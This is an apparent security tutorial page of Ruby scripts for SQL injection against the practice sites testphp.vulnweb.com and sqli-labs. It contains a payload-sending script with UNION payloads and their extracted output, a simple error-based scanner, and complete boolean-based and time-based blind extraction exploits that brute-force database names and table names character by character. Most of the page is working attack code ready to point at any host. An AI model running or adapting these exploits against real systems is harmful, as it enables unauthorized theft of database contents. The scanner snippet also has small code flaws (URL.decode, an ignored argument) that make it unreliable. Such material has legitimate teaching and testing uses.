SQL Injection Scanner

Basic SQLi script as command line browser

The is a very basic script take your given payload and send it to the vulnerable parameter and returns the response back to you. I'll use (http://testphp.vulnweb.com/) as it's legal to test.
1
#!/usr/bin/env ruby
2
# KING SABRI | @KINGSABRI
3
# Send your payload from command line
4
#
5
require "net/http"
6
7
if ARGV.size < 2
8
puts "[+] ruby #{__FILE__} [IP ADDRESS] [PAYLOAD]"
9
exit 0
10
else
11
host, payload = ARGV
12
end
13
14
uri = URI.parse("http://#{host}/artists.php?")
15
uri.query = URI.encode_www_form({"artist" => "#{payload}"})
16
http = Net::HTTP.new(uri.host, uri.port)
17
http.use_ssl = true if uri.scheme == 'https' # Enable HTTPS support if it's HTTPS
18
# http.set_debug_output($stdout)
19
20
request = Net::HTTP::Get.new(uri.request_uri)
21
response = http.request(request)
22
# puts "[+] Status code: "+ response.code + "\n\n"
23
# puts response.body.gsub(/<.*?>/, '').strip
24
puts response.body.scan(/<h2 id='pageName'>.*<\/h2>/).join.gsub(/<.*?>/, '').strip
25
26
puts ""
Copied!
I've commented the line puts response.body.gsub(/<.*?>/, '').strip and added a custom regular expression to fix our target outputs.
Let's to test it in action
1
ruby sqli-basic.rb "testphp.vulnweb.com" "-1 UNION ALL SELECT NULL,NULL,NULL,NULL#" | grep -i -e warning -e error
2
# => Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/artists.php on line 62
3
4
ruby sqli-basic.rb "testphp.vulnweb.com" "-1 UNION ALL SELECT NULL,NULL,NULL#" | grep -i -e warning -e error
5
# =>
6
7
ruby sqli-basic.rb "testphp.vulnweb.com" "-1 UNION ALL SELECT NULL,@@VERSION,NULL#"
8
# => artist: 5.1.73-0ubuntu0.10.04.1
9
10
ruby sqli-basic.rb "testphp.vulnweb.com" "-1 UNION ALL SELECT NULL,GROUP_CONCAT(table_name),NULL FROM information_schema.tables#"
11
# => artist: CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVIL
Copied!
Here a very basic and simple SQL-injection solid scanner, develop it as far as you can!
1
#!/usr/bin/env ruby
2
# KING SABRI | @KINGSABRI
3
# Very basic SQLi scanner!
4
#
5
require 'net/http'
6
7
# Some SQLi payloads
8
payloads =
9
[
10
"'",
11
'"',
12
"' or 1=2--+"
13
]
14
15
# Some database error responses
16
errors =
17
{
18
:mysql => [
19
"SQL.*syntax",
20
"mysql.*(fetch).*array",
21
"Warning"
22
],
23
:mssql => [
24
"line.*[0-9]",
25
"Microsoft SQL Native Client error.*"
26
],
27
:oracle => [
28
".*ORA-[0-9].*",
29
"Warning"
30
]
31
}
32
33
# Try a known vulnerable site
34
uri = URI.parse "http://testphp.vulnweb.com/artists.php?artist=1"
35
36
# Update the query with a payload
37
uri.query += payloads[0]
38
39
# Send get request
40
response = Net::HTTP.get uri
41
42
# Search if an error occurred = vulnerable
43
puts "[+] The #{URL.decode(uri.to_s)} is vulnerable!" unless response.match(/#{errors[:mysql][0]}/i).nil?
Copied!
Results
1
ruby sqli.rb http://testasp.vulnweb.com/showforum.asp?id=0
2
[+] The http://testphp.vulnweb.com/artists.php?artist=1' is vulnerable!
Copied!

Boolean-bases SQLi Exploit Script

Here is a Boolean-based SQLi exploit for sqli-labs vulnerable application.
1
#!/usr/bin/env ruby
2
# Boolean-based SQLi exploit
3
# Sabri Saleh | @KINGSABRI
4
#
5
require 'open-uri'
6
7
if ARGV.size < 1
8
puts "[+] ruby #{__FILE__} <IP ADDRESS>"
9
exit 0
10
else
11
host = ARGV[0]
12
end
13
14
# Just colorizing outputs
15
class String
16
def red; colorize(self, "\e[1m\e[31m"); end
17
def green; colorize(self, "\e[1m\e[32m"); end
18
def bold; colorize(self, "\e[1m"); end
19
def colorize(text, color_code) "#{color_code}#{text}\e[0m" end
20
end
21
22
# SQL injection
23
def send_bbsqli(url, query)
24
begin
25
26
response = open(URI.parse( URI.encode("#{url}#{query}") ))
27
28
if !response.read.scan("You are in...........").empty?
29
return 1 # TRUE
30
end
31
32
rescue Exception => e
33
puts "[!] Failed to SQL inject #{e}".red
34
exit 0
35
end
36
end
37
38
url = "http://#{host}/sqli-labs/Less-8/index.php?id="
39
40
puts "[*] Start Sending Boolean-based SQLi".bold
41
42
extracted = []
43
(1..100).map do |position|
44
(32..126).map do |char|
45
puts "[*] Brute-forcing on Position: ".bold + "#{position}".green + " | ".bold + "Character: ".bold + "#{char} = #{char.chr}".green
46
47
# Put your query here
48
# query = "1' AND (ASCII(SUBSTR((SELECT DATABASE()),#{position},1)))=#{char}--+"
49
query = "1' AND (ASCII(SUBSTR((SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1),#{position},1)))=#{char}--+"
50
result = send_bbsqli(url, query)
51
if result.eql? 1
52
puts "[+] Found character: ".bold + "#{char.to_s(16)} hex".green
53
54
extracted << char.chr
55
puts "[+] Extracted characters: ".bold + "#{extracted.join}".green
56
break
57
end
58
end
59
end
60
61
puts "\n\n[+] Final found string: ".bold + "#{extracted.join}".green
Copied!

Time-bases SQLi Exploit Script

A Time-based SQLi exploit for sqli-labs vulnerable application.
1
#!/usr/bin/env ruby
2
# Boolean-based SQLi exploit
3
# Sabri Saleh | @KINGSABRI
4
#
5
require 'open-uri'
6
7
if ARGV.size < 1
8
puts "[+] ruby #{__FILE__} <IP ADDRESS>"
9
exit 0
10
else
11
host = ARGV[0]
12
end
13
14
# Just colorizing outputs
15
class String
16
def red; colorize(self, "\e[1m\e[31m"); end
17
def green; colorize(self, "\e[1m\e[32m"); end
18
def bold; colorize(self, "\e[1m"); end
19
def colorize(text, color_code) "#{color_code}#{text}\e[0m" end
20
end
21
22
# SQL injection
23
def send_tbsqli(url, query, time2wait)
24
begin
25
start_time = Time.now
26
response = open(URI.parse( URI.encode("#{url}#{query}") ))
27
end_time = Time.now
28
howlong = end_time - start_time
29
30
if howlong >= time2wait
31
return 1 # TRUE
32
end
33
34
rescue Exception => e
35
puts "[!] Failed to SQL inject #{e}".red
36
exit 0
37
end
38
end
39
40
url = "http://#{host}/sqli-labs/Less-10/index.php?id="
41
42
puts "[*] Start Sending Boolean-based SQLi".bold
43
time2wait = 5
44
extracted = []
45
(1..76).map do |position|
46
(32..126).map do |char|
47
puts "[*] Brute-forcing on Position: ".bold + "#{position}".green + " | ".bold + "Character: ".bold + "#{char} = #{char.chr}".green
48
49
# Put your query here
50
query = "1\" AND IF((ASCII(SUBSTR((SELECT DATABASE()),#{position},1)))=#{char}, SLEEP(#{time2wait}), NULL)--+"
51
52
result = send_tbsqli(url, query, time2wait)
53
if result.eql? 1
54
puts "[+] Found character: ".bold + "#{char.to_s(16)} hex".green
55
56
extracted << char.chr
57
puts "[+] Extracted characters: ".bold + "#{extracted.join}".green
58
break
59
end
60
end
61
end
62
63
puts "\n\n[+] Final found string: ".bold + "#{extracted.join}".green
Copied!